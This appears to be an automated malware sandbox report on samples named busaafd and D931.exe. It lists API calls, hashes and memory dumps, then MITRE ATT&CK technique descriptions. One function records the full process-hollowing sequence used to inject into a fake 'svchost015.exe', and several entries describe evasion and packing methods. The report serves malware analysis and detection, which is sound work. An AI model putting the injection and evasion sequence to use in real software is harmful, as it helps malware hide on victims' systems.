Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 005B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D

Strings

kernel32.dll, xrefs: 005B008F, 005B0095
cess, xrefs: 005B018D

Memory Dump Source

Source File: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_busaafd.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14

Function 0041AA64 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
GlobalSize.KERNEL32(00000000), ref: 0041AABB
InterlockedDecrement.KERNEL32(?), ref: 0041AAE8

Strings

k`, xrefs: 0041AACD
}$, xrefs: 0041AAEF

Memory Dump Source

Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd

Similarity

API ID: DecrementGlobalInterlockedLibraryLoadSize
String ID: k`$}$
API String ID: 2499385582-956986773
Opcode ID: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
Instruction ID: fcda37833e7166e974b459af4bde307c7f2281d154bce7f8072bdce0eb6676ce
Opcode Fuzzy Hash: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
Instruction Fuzzy Hash: E31127346892508AC624A760DD457EBB761EF58356F11403FE646822A1CA7854E1CBDF

Function 007A78C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007A78EE
Module32First.KERNEL32(00000000,00000224), ref: 007A790E

Memory Dump Source

Source File: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7a4000_busaafd.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 69d06cd6c17eb4673ad29fe63a15747fad1c6327218b213d0048e0a606613505
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A5F06232600714AFD7243AB59C8DB6B76E8AF8A725F100629E642910C0DB78E945C661

Function 005B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E

Memory Dump Source

Source File: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_busaafd.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5

Function 0041A5C0 Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00421D18,00421ECC,00000040,?), ref: 0041A5D8

Memory Dump Source

Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
Instruction ID: fb7c44a773a415b676b39fc02758dbf11eb15df709cce15dc9b7056abff92ea5
Opcode Fuzzy Hash: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
Instruction Fuzzy Hash: 47D0A9B820020CABC210CB40EC41E22736CD788200B004268BE0C43260E671B90186A8

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 007A7585 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007A75D6

Memory Dump Source

Source File: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7a4000_busaafd.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f2d5e99dd5d3b5562b7d45f9a85d47872dc193266cddc3685936dbdc7573a68f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EF113C79A00208EFDB01DF98C989E98BBF5EF08351F058094F9489B362D375EA50DF84

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Non-executed Functions

Function 0041A670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A69C
UnhandledExceptionFilter.KERNEL32(00000000), ref: 0041A6A4
GetComputerNameW.KERNEL32(?,?), ref: 0041A6F7

Strings

-, xrefs: 0041A704

Memory Dump Source

Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd

Similarity

API ID: ComputerExceptionFilterNamePrivateProfileStringUnhandledWrite
String ID: -
API String ID: 1470029763-2547889144
Opcode ID: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
Instruction ID: 4b5e4e4b6f83c94ba78a0dd8dd4ce6fb1df44620f0ca627238bf55da635243b7
Opcode Fuzzy Hash: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
Instruction Fuzzy Hash: 7711E9319012189BD760DF64DC85BDE77F4FB08310F15C1B9E5D59B180CA745AC58F8A

Function 0041A730 Relevance: 6.0, APIs: 4, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,00000000,00000000,00000000,0041B044,0041AAA1), ref: 0041A74C
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,0041B044,0041AAA1), ref: 0041A767
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0041A78A
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041A792

Memory Dump Source

Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd

Similarity

API ID: AllocateDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 975556166-0
Opcode ID: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
Instruction ID: d58ed8a6e156ce39838269d538da37acbc757045de5b3d1f898b295708f67049
Opcode Fuzzy Hash: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
Instruction Fuzzy Hash: 78F08935781200E7E6306B64EC49B863774EB18713F514032F719961F0C7A459818F5E

Analysis Process: D931.exePID: 7888, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	51.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.1%
Total number of Nodes:	35
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 030AA090 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 324
threadmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 030AA101
CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 030AA331
WriteFile.KERNELBASE(00000000,?,002DA188,00000000,00000000), ref: 030AA35B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 030AA36D
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 030AA3A5
NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 030AA3BF
VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 030AA3EA
WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 030AA40E
WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 030AA470
Wow64GetThreadContext.KERNEL32(?,00010002), ref: 030AA49E
Wow64SetThreadContext.KERNEL32(?,00010002), ref: 030AA4C9
ResumeThread.KERNELBASE(?), ref: 030AA4DB
ExitProcess.KERNEL32(00000000), ref: 030AA4E8

Strings

svchost015.exe, xrefs: 030AA2EC, 030AA2F2

Memory Dump Source

Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30a9000_D931.jbxd

Yara matches

Similarity

API ID: Process$MemoryThreadWrite$ContextCreateFileVirtualWow64$AllocAllocateChangeCloseExitFindNotificationResumeSectionUnmapView
String ID: svchost015.exe
API String ID: 2318777327-4092349249
Opcode ID: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
Instruction ID: 489820225a97e939e17ebe83437aa70048d805cbca82cb48856f5f6372553e63
Opcode Fuzzy Hash: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
Instruction Fuzzy Hash: DDE1FC74A002089FDB14CF98D895FEEB7B5BF88304F148199E608AB391D775AE85CF94

Function 030A93F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 030A9B50: VirtualAlloc.KERNELBASE(00000000,030A94AF,00003000,00000040), ref: 030A9BD4

NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 030A95BB
FindCloseChangeNotification.KERNELBASE(00000000), ref: 030A966C

Strings

@, xrefs: 030A953D

Memory Dump Source

Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30a9000_D931.jbxd

Yara matches

Similarity

API ID: AllocChangeCloseCreateFileFindNotificationVirtual
String ID: @
API String ID: 482251274-2766056989
Opcode ID: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
Instruction ID: c9555f09e0e403c8d1a98ea75f7fd51c8de778329ae6d356865e14236432591e
Opcode Fuzzy Hash: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
Instruction Fuzzy Hash: 80811171A01618EFDB24DF58DC55FDAB3B5AF88700F1481E9E60DAB290D7706A84CF94

Function 030A96B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.tex, xrefs: 030A9774

Memory Dump Source

Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30a9000_D931.jbxd

Yara matches

Similarity

API ID:
String ID: .tex
API String ID: 0-1946526065
Opcode ID: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
Instruction ID: 0925a1ea43fc58e4b6c2fe2174ebf24ff9eaf2280396754d89176517fb08d65f
Opcode Fuzzy Hash: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
Instruction Fuzzy Hash: F651F475E01509EFCB44CFC8D894BEEFBB5FB48305F248599D815AB280D335AA85CBA0

Function 030A9B50 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,030A94AF,00003000,00000040), ref: 030A9BD4

Strings

VirtualAlloc, xrefs: 030A9BB9, 030A9BBC

Memory Dump Source

Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30a9000_D931.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction ID: be2228abe4b426df5a6498f027afcc5ca69e47d5eeb7173702afe66b7bfd5c7f
Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction Fuzzy Hash: 2F113D60D083CDEEEB01DBE89409BEFBFB55F11704F084098D6446A282D3BA5758CBB6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
